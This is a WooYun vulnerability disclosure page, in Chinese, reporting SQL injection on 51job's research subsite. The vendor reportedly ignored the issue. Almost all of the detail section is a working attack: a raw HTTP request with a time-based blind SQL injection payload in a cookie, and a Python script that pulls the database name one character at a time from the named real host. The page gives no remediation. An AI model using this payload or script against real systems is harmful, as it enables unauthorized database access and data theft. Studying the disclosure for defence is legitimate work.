当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0218066

漏洞标题:51job分站存在SQL注入

相关厂商:前程无忧(51job)

漏洞作者: 路人甲

提交时间:2016-06-10 18:51

修复时间:2016-06-17 11:00

公开时间:2016-06-17 11:00

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-06-10: 细节已通知厂商并且等待厂商处理中
2016-06-10: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-06-17: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

51job分站存在SQL注入

详细说明:

GET /order.html HTTP/1.1
Cookie: ASPSESSIONIDQCCBRQDA=PAAEILKAFGNBCKPECJMAKPMM; readlist=196%2C25%2C294%2C340%2C307; orderlist=-1)%3Bif(ascii(substring(USER,1,1))>103)%20waitfor%20delay%20'0:0:10'%20--%20; Hm_lvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491620,1465491620,1465491621,1465491621; Hm_lpvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491621; HMACCOUNT=CE77C9E3D0040FF7
X-Requested-With: XMLHttpRequest
Referer: http://research.51job.com/
Host: research.51job.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


current result is h{{l

#!/usr/bin/python
# coding=utf-8
import httplib,time,string,sys,random,urllib
import requests
def getPayloadCookie(i,payload):
    x = "ASPSESSIONIDQCCBRQDA=PAAEILKAFGNBCKPECJMAKPMM; readlist=196%2C25%2C294%2C340%2C307; orderlist=-1)%3Bif(ascii(substring(DB_NAME(),"+str(i)+",1))>"+str(ord(payload))+")%20waitfor%20delay%20'0:0:10'%20--%20; Hm_lvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491620,1465491620,1465491621,1465491621; Hm_lpvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491621; HMACCOUNT=CE77C9E3D0040FF7"
    headers = {
        'Host': 'research.51job.com',
        'Accept': '*/*',
        'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36',
        'Accept-Encoding': 'gzip, deflate, sdch',
        'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'http://research.51job.com/',
        'Connection': 'Keep-alive',
        'Cookie': x
    }
    return headers
def exploit():
    res = ''
    url = 'http://research.51job.com/order.html'
    payloads = ['@','_','.']+ list(string.ascii_lowercase)+list(string.ascii_uppercase) +[str(i) for i in range(10) ]
    payloads = sorted(payloads,reverse=True)
    for i in range(1,30,1):
        for payload in payloads:
            try:
                headers = getPayloadCookie(i,payload)
                response = requests.request(method='GET',url=url,headers=headers, timeout=3)
                print chr(ord(payload)+1),
                sys.stdout.flush()
            except Exception,e:
                res += chr(ord(payload)+1)
                print "\ncurrent result is",res
                break
    print res
if __name__=='__main__':
    exploit()
    #getPayloadCookie(2,'a')

漏洞证明:

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2016-06-17 11:00

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无